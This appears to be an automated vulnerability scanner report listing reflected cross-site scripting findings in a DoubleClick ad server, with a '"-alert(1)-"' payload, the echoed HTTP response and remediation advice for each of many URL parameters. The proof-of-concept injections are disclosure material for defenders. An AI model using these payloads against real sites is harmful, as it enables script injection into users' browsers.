<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... net/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=21bee6"-alert(1)-"81ed37232b7&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&p ...[SNIP]...
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 562b5"-alert(1)-"2c378b10046 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:11:39 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com562b5"-alert(1)-"2c378b10046&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_med ...[SNIP]...
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fae52"-alert(1)-"3dcf514d1d0 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:12:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 1&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFIfae52"-alert(1)-"3dcf514d1d0&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false;
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab0ff"-alert(1)-"2a6292d3f6b was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:08:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 1242665%3B1-0%3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=ab0ff"-alert(1)-"2a6292d3f6b&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.2 ...[SNIP]...
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68308"-alert(1)-"d64be5ea104 was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=10068308"-alert(1)-"d64be5ea104&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/htt ...[SNIP]...
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1876d"-alert(1)-"160f9d82a0c was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... /adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=1876d"-alert(1)-"160f9d82a0c&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295. ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3ce1"-alert(1)-"791190644da was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:06:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 16c/%2a/j%3B231242665%3B1-0%3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301b3ce1"-alert(1)-"791190644da&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI& ...[SNIP]...
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d649"-alert(1)-"cfdd3f5d6a4 was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:12:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... =2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.181d649"-alert(1)-"cfdd3f5d6a4&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fscUrl = url; var fs ...[SNIP]...
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 589a1"-alert(1)-"fe600fcd18e was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 7757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4589a1"-alert(1)-"fe600fcd18e&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH& ...[SNIP]...
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c01f"-alert(1)-"1e1ca44f3c0 was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=4766227c01f"-alert(1)-"1e1ca44f3c0&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmo ...[SNIP]...
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eda0f"-alert(1)-"fa66ca5b726 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:06:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3eda0f"-alert(1)-"fa66ca5b726&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqd ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e17b0"-alert(1)-"23356903145 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:03:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]...
var url = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023e17b0"-alert(1)-"23356903145&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90ad4"-alert(1)-"77acc02db13 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:13:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.2090ad4"-alert(1)-"77acc02db13&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; ...[SNIP]...
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7524b"-alert(1)-"e973f58c800 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:06 GMT
Expires: Mon, 22 Nov 2010 00:10:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7063
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon ...[SNIP]... /click%3Bh%3Dv8/3a5a/17/14a/%2a/g%3B231155693%3B0-0%3B0%3B54795159%3B4307-300/250%3B36901567/36919445/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=27524b"-alert(1)-"e973f58c800&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11 ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81642"-alert(1)-"7b5e5f069a0 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:07:12 GMT
Expires: Mon, 22 Nov 2010 00:12:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6715
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri ...[SNIP]... 93%3B5-0%3B0%3B54795159%3B4307-300/250%3B38460446/38478203/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=19248781642"-alert(1)-"7b5e5f069a0&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/vr ...[SNIP]...
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e518"-alert(1)-"dd64696a94d was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:53 GMT
Expires: Mon, 22 Nov 2010 00:15:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7163
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed ...[SNIP]... log/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=3e518"-alert(1)-"dd64696a94d&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsized_business/solutions/informationprotection&cmp=usmmb& ...[SNIP]...
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 770c4"-alert(1)-"c8ab4cf7ab6 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:42 GMT
Expires: Mon, 22 Nov 2010 00:15:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7028
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu ...[SNIP]... .com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=770c4"-alert(1)-"c8ab4cf7ab6&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/information-analytics.html?cmp=blank&cm=b&csr=agus_itquest-20100521&cr= ...[SNIP]...
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfb33"-alert(1)-"b08b2fbdfeb was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:13 GMT
Expires: Mon, 22 Nov 2010 00:14:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6715
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri ...[SNIP]... B0%3B54795159%3B4307-300/250%3B38460446/38478203/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=cfb33"-alert(1)-"b08b2fbdfeb&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/vrm/pref/263 ...[SNIP]...
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24bbb"-alert(1)-"7c6d580aa85 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:03 GMT
Expires: Mon, 22 Nov 2010 00:15:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7119
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon ...[SNIP]... Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=24bbb"-alert(1)-"7c6d580aa85&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/security-resiliency.html?cmp=blank&cm=b&csr= ...[SNIP]...
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 290b3"-alert(1)-"70e6e14f3b9 was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7025
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 22 Nov 2010 00:11:35 GMT
Expires: Mon, 22 Nov 2010 00:16:35 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu ...[SNIP]... nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=290b3"-alert(1)-"70e6e14f3b9http://www.ibm.com/systems/smarter/questions/process-transformation.html?cmp=blank&cm=b&csr=agus_itquest-20100521&cr=zdnet&ct=108AU0QW&cn=telecom"); var fscUrl = url; var fscUrlClickTagFound = false; v ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cbfb"-alert(1)-"835e9647437 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:36 GMT
Expires: Mon, 22 Nov 2010 00:09:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7119
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu ...[SNIP]... ick.net/click%3Bh%3Dv8/3a5a/17/14a/%2a/t%3B231155693%3B2-0%3B0%3B54795159%3B4307-300/250%3B37853710/37871528/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn3cbfb"-alert(1)-"835e9647437&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t= ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddc4f"-alert(1)-"72623d3e15c was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:20 GMT
Expires: Mon, 22 Nov 2010 00:10:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6715
